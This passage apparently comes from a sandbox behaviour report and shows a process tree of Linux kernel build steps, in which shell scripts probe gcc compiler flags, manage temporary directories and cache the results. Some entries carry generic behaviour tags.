-DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -Waddress-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1909 -
/bin/mkdirmkdir -p /tmp/a/.tmp_19094⤵PID:1910
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -Waddress-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1909/tmp4⤵PID:1911
-
/bin/rmrm -rf /tmp/a/.tmp_19094⤵PID:1912
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Waddress-of-packed-member_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-address-of-packed-member\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵PID:1913
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -Wattribute-alias -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-attribute-alias\"; else echo \"\"; fi"3⤵PID:1914
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19144⤵PID:1915
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -Wattribute-alias -c -x c /dev/null -o /tmp/a/.tmp_1914/tmp4⤵PID:1916
-
/bin/rmrm -rf /tmp/a/.tmp_19144⤵PID:1917
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Wattribute-alias_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-attribute-alias\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1918 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"--param=allow-store-data-races=0\"; else echo \"\"; fi"3⤵PID:1919
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19194⤵
- Reads runtime system information
PID:1920 -
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -c -x c /dev/null -o /tmp/a/.tmp_1919/tmp4⤵PID:1921
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1919/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1922
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1919/tmp5⤵PID:1923
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1919/tmp5⤵PID:1923
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1919/tmp5⤵PID:1923
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1919/tmp5⤵PID:1923
-
/bin/rmrm -rf /tmp/a/.tmp_19194⤵PID:1924
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"--param_allow-store-data-races_0\";_else_echo_\"\";_fi := --param=allow-store-data-races=0' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1925 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -fno-allow-store-data-races -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-allow-store-data-races\"; else echo \"\"; fi"3⤵PID:1926
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19264⤵PID:1927
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -fno-allow-store-data-races -c -x c /dev/null -o /tmp/a/.tmp_1926/tmp4⤵PID:1928
-
/bin/rmrm -rf /tmp/a/.tmp_19264⤵PID:1929
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-fno-allow-store-data-races_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-allow-store-data-races\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1930 -
/bin/bash/bin/bash ./scripts/gcc-goto.sh gcc -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0"3⤵PID:1931
-
/usr/bin/gccgcc -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -x c - -c -o /dev/null4⤵PID:1933
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" - -quiet -dumpbase - -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /dev/null -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:1934
-
/usr/local/sbin/asas --64 -o /dev/null5⤵PID:1935
-
/usr/local/bin/asas --64 -o /dev/null5⤵PID:1935
-
/usr/sbin/asas --64 -o /dev/null5⤵PID:1935
-
/usr/bin/asas --64 -o /dev/null5⤵PID:1935
-
/bin/catcat4⤵PID:1932
-
/bin/sh/bin/sh -c "echo '__cached_/bin/bash_./scripts/gcc-goto.sh_gcc_-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx__-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context___-O2_--param_allow-store-data-races_0_ := y' >> /tmp/a/.cache.mk"3⤵PID:1936
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wframe-larger-than=1024\"; else echo \"\"; fi"3⤵PID:1937
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19374⤵PID:1938
-
